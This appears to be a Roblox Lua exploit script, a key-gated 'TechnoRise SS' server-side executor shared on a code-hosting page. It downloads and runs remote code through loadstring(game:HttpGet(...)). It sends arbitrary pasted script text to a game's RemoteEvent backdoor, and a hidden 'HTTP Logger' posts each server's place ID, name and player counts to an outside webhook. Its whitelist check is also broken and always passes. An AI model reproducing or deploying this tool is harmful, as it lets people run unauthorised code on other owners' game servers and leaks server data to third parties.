local OrionLib = loadstring(game:HttpGet(('https://[Log in to view URL]')))()
local Player = game.Players.LocalPlayer
local Window = OrionLib:MakeWindow({Name = "Key System", HidePremium = false, SaveConfig = true, Introtext = "Key System"})
OrionLib:MakeNotification({
Name = "Logged in!",
Content = "You are logged in as "..Player.Name.." ",
Image = "rbxassetid://4483345998",
Time = 5
})
_G.Key = "TechnoRiseSSKey_clkdeqfjldddofnfzei9ufiufe"
_G.KeyInput = "string"
function MakeScriptHub()
print 'EnteredCorrectKey'
print 'gui loaded'
-- group
local module = {}
local plr = game.Players.LocalPlayer
if plr:IsInGroup(32564934)then
print("Grouplisted !")
else
plr:Kick("join team xybname first")
end
-- whitelist
if plr.Name == "ChaoticRedSmile" or "ChaoticRedSmileAlt" or "XybName" or "JO1TAR0" or "FireServiceScripter" or "FireServiceScripter1" or "c00lkiddoso" or "c00lkiddoso1" or "dark_XybName" then
print("Whitelisted + cool !")
else
plr:Kick("cry about it skid")
end
-- friendlist
local plr = game.Players.LocalPlayer
if (plr:IsFriendsWith(5278831615)) then
print("surely whitelisted")
else
plr:Kick("Skiddeeeer")
end
-- Watermark
-- Watermark
local Water = Instance.new("ScreenGui")
local TextLabel = Instance.new("TextLabel")
local UIGradient = Instance.new("UIGradient")
Water.Name = game:GetService("HttpService"):GenerateGUID(true)
Water.Parent = (game:GetService("CoreGui") or gethui())
Water.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
TextLabel.Parent = Water
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.00658436213, 0, 0, 0)-UDim2.new(0,0,1,0)
TextLabel.Size = UDim2.new(0, 200, 0, 32)
TextLabel.Font = Enum.Font.Cartoon
TextLabel.Text = "TechnoRise SS has loaded !"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true
TextLabel.TextXAlignment = Enum.TextXAlignment.Left
TextLabel:TweenPosition(UDim2.new(0.00658436213, 0, 0, 0),"Out","Quart",1)
UIGradient.Color =ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(196, 8, 202)), ColorSequenceKeypoint.new(0.13, Color3.fromRGB(199, 15, 191)), ColorSequenceKeypoint.new(0.48, Color3.fromRGB(247, 127, 28)), ColorSequenceKeypoint.new(0.89, Color3.fromRGB(254, 7, 59)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 2, 61))}
--[Instances]
local main = Instance.new("ScreenGui")
local frame = Instance.new("Frame")
local tilter = Instance.new("TextLabel")
local script = Instance.new("TextBox")
local execute = Instance.new("TextButton")
local clear = Instance.new("TextButton")
local cope = Instance.new("TextButton")
local button30 = Instance.new("TextButton")
local frame2 = Instance.new("Frame")
local tilter2 = Instance.new("TextLabel")
local button31 = Instance.new("TextButton")
local button32 = Instance.new("TextButton")
local button33 = Instance.new("TextButton")
--[Code
-- HTTP Logger
local PlaceId = game.PlaceId
local plrs = game.Players
local maxplayers = plrs.MaxPlayers
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local plr = game:GetService("Players")
local http = game:GetService("HttpService")
plr.PlayerAdded:Connect(function(a)
local a = {
["embeds"] = {
{
["title"] = "**Click Here**",
["url"] = "https://[Log in to view URL]"..PlaceId,
["description"] = "Game Name: " .. "`"..GetName.Name.."`",
["type"] = "rich",
["color"]= tonumber(0xff0000),
["footer"] = {
["icon_url"] = 'https://[Log in to view URL]',
["text"] = ""
},
["thumbnail"] = {
["url"] = "https://[Log in to view URL]"..game.PlaceId.."&width=768&height=432&format=png",
},
["author"] = {
["name"] = "name"
},
["fields"] = {
{
["name"] = '**Players in game**',
["value"] = "`"..#plrs:GetPlayers().."`",
["inline"] = true
},
{
["name"] = '**Max Server Size**',
["value"] = "`"..game.Players.MaxPlayers.."`",
["inline"] = true,
},
{
["name"] = '**Place ID**',
["value"] = "`"..game.PlaceId.."`",
["inline"] = true
},
}
}}
}
a = http:JSONEncode(a)
http:PostAsync("https://[Log in to view URL]", a)
end)
-- Notif
local msg = Instance.new("Message",workspace)
msg.Text = "Thanks For Bought TechnoRise SS !"
wait(3.8)
msg:Destroy()
--]
--[SS EXECUTOR]
main.Name = "main"
main.Parent = game.CoreGui
frame.Name = "frame"
frame.Parent = main
frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
frame.BorderColor3 = Color3.fromRGB(255, 0, 0)
frame.BorderSizePixel = 3
frame.Position = UDim2.new(-0.00133678317, 0, -0.00348037481, 0)
frame.Size = UDim2.new(0, 438, 0, 238)
frame.Active = true
frame.Draggable = true
tilter.Name = "tilter"
tilter.Parent = frame
tilter.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
tilter.BorderColor3 = Color3.fromRGB(255, 0, 0)
tilter.BorderSizePixel = 3
tilter.Position = UDim2.new(0.997245014, 0, 0, 0)
tilter.Size = UDim2.new(0, 150, 0, 40)
tilter.Font = Enum.Font.GothamSemibold
tilter.Text = "TechnoRise SS v1.3"
tilter.TextColor3 = Color3.fromRGB(255, 255, 255)
tilter.TextScaled = true
tilter.TextSize = 12.000
tilter.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
tilter.TextWrapped = true
script.Name = "script"
script.Parent = frame
script.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
script.Position = UDim2.new(0.531963468, 0, 0.466386557, 0)
script.Size = UDim2.new(0, 199, 0, 50)
script.ZIndex = 999999
script.ClearTextOnFocus = false
script.Font = Enum.Font.GothamSemibold
script.Text = "-- Paste here"
script.TextColor3 = Color3.fromRGB(255, 255, 255)
script.TextSize = 14.000
script.TextWrapped = true
execute.Name = "execute"
execute.Parent = frame
execute.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
execute.BorderColor3 = Color3.fromRGB(0, 0, 0)
execute.BorderSizePixel = 3
execute.Position = UDim2.new(0.0159817357, 0, 0.142857149, 0)
execute.Size = UDim2.new(0, 209, 0, 33)
execute.Font = Enum.Font.SourceSans
execute.Text = "Execute"
execute.TextColor3 = Color3.fromRGB(0, 0, 0)
execute.TextSize = 30.000
execute.TextWrapped = true
execute.MouseButton1Down:connect(function()
game.ReplicatedStorage.RemoteEvent:FireServer(script.Text)
print 'your script has been executed'
end)
clear.Name = "clear"
clear.Parent = frame
clear.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
clear.BorderColor3 = Color3.fromRGB(0, 0, 0)
clear.BorderSizePixel = 3
clear.Position = UDim2.new(0.509132445, 0, 0.142857149, 0)
clear.Size = UDim2.new(0, 209, 0, 33)
clear.Font = Enum.Font.SourceSans
clear.Text = "Clear"
clear.TextColor3 = Color3.fromRGB(0, 0, 0)
clear.TextSize = 30.000
clear.TextWrapped = true
clear.MouseButton1Down:connect(function()
script.Text = ""
print 'your textbox has been clear'
end)
cope.Name = "Close"
cope.Parent = main
cope.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
cope.BorderColor3 = Color3.fromRGB(255, 0, 0)
cope.BorderSizePixel = 3
cope.Position = UDim2.new(0,3,0.3,380)
cope.Size = UDim2.new(0, 100, 0, 15)
cope.Font = Enum.Font.SourceSans
cope.Text = "-"
cope.TextColor3 = Color3.fromRGB(255, 255, 255)
cope.TextSize = 18.000
cope.MouseButton1Down:connect(function()
if cope.Text == "-" then
frame.Visible = false
cope.Text = "+" else
frame.Visible = true
cope.Text = "-"
end
end)
button30.Name = "button"
button30.Parent = frame
button30.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button30.BorderColor3 = Color3.fromRGB(255, 0, 0)
button30.BorderSizePixel = 3
button30.Position = UDim2.new(0.25, 0, 0.7, 0)
button30.Size = UDim2.new(0, 75, 0, 30)
button30.Font = Enum.Font.SourceSans
button30.Text = "Miscellaneous"
button30.TextColor3 = Color3.fromRGB(255, 255, 255)
button30.TextSize = 14.000
button30.TextWrapped = true
button30.MouseButton1Down:connect(function()
frame2.Visible = true
frame.Visible = false
end)
frame2.Name = "frame"
frame2.Parent = main
frame2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
frame2.BorderColor3 = Color3.fromRGB(255, 0, 0)
frame2.BorderSizePixel = 3
frame2.Position = UDim2.new(-0.00133678317, 0, -0.00348037481, 0)
frame2.Size = UDim2.new(0, 438, 0, 238)
frame2.Active = true
frame2.Draggable = true
frame2.Visible = false
tilter2.Name = "tilter"
tilter2.Parent = frame2
tilter2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
tilter2.BorderColor3 = Color3.fromRGB(255, 0, 0)
tilter2.BorderSizePixel = 3
tilter2.Position = UDim2.new(0.997245014, 0, 0, 0)
tilter2.Size = UDim2.new(0, 300, 0, 40)
tilter2.Font = Enum.Font.GothamSemibold
tilter2.Text = "TechnoRise SS | Miscellaneous"
tilter2.TextColor3 = Color3.fromRGB(255, 255, 255)
tilter2.TextScaled = true
tilter2.TextSize = 12.000
tilter2.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
tilter2.TextWrapped = true
button31.Name = "button"
button31.Parent = frame2
button31.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button31.BorderColor3 = Color3.fromRGB(255, 0, 0)
button31.BorderSizePixel = 3
button31.Position = UDim2.new(0.25, 0, 0.1, 0)
button31.Size = UDim2.new(0, 75, 0, 30)
button31.Font = Enum.Font.SourceSans
button31.Text = "SS Executor"
button31.TextColor3 = Color3.fromRGB(255, 255, 255)
button31.TextSize = 14.000
button31.TextWrapped = true
button31.MouseButton1Down:connect(function()
frame2.Visible = false
frame.Visible = true
end)
button32.Name = "button"
button32.Parent = frame2
button32.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
button32.BorderColor3 = Color3.fromRGB(255, 0, 0)
button32.BorderSizePixel = 3
button32.Position = UDim2.new(0.25, 0, 0.3, 0)
button32.Size = UDim2.new(0, 75, 0, 30)
button32.Font = Enum.Font.SourceSans
button32.Text = "More Coming soon!"
button32.TextColor3 = Color3.fromRGB(255, 255, 255)
button32.TextSize = 14.000
button32.TextWrapped = true
button32.MouseButton1Down:connect(function()
end)
button33.Name = "button"
button33.Parent = frame
button33.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
button33.BorderColor3 = Color3.fromRGB(0, 0, 0)
button33.BorderSizePixel = 3
button33.Position = UDim2.new(0.50, 0, 0.7, 0)
button33.Size = UDim2.new(0, 209, 0, 33)
button33.Font = Enum.Font.SourceSans
button33.Text = "Copy"
button33.TextColor3 = Color3.fromRGB(0, 0, 0)
button33.TextSize = 30.000
button33.TextWrapped = true
button33.MouseButton1Down:connect(function()
setclipboard(script.Text)
end)
end
function CorrectKeyNotification()
OrionLib:MakeNotification({
Name = "Correct Key!",
Content = "You have entered the correct key!",
Image = "rbxassetid://4483345998",
Time = 5
})
end
function IncorrectKeyNotification()
OrionLib:MakeNotification({
Name = "Incorrect Key!",
Content = "You have entered the incorrect key!",
Image = "rbxassetid://4483345998",
Time = 5
})
end
local Tab = Window:MakeTab({
Name = "Key",
Icon = "rbxassetid://4483345998",
PremiumOnly = false
})
Tab:AddTextbox({
Name = "Enter Key",
Default = "",
TextDisappear = true,
Callback = function(Value)
_G.KeyInput = Value
end
})
Tab:AddButton({
Name = "Check Key",
Callback = function()
if _G.KeyInput == _G.Key then
MakeScriptHub()
CorrectKeyNotification()
else
IncorrectKeyNotification()
end
end
})
Tab:AddButton({
Name = "Get Key",
Callback = function()
local msg = Instance.new("Message",workspace)
msg.Text = "Check your clipboard"
wait(1.8)
msg:Destroy()
setclipboard("Buy it ! join the discord server https://[Log in to view URL]")
end
})
To embed this project on your website, copy the following code and paste it into your website's HTML: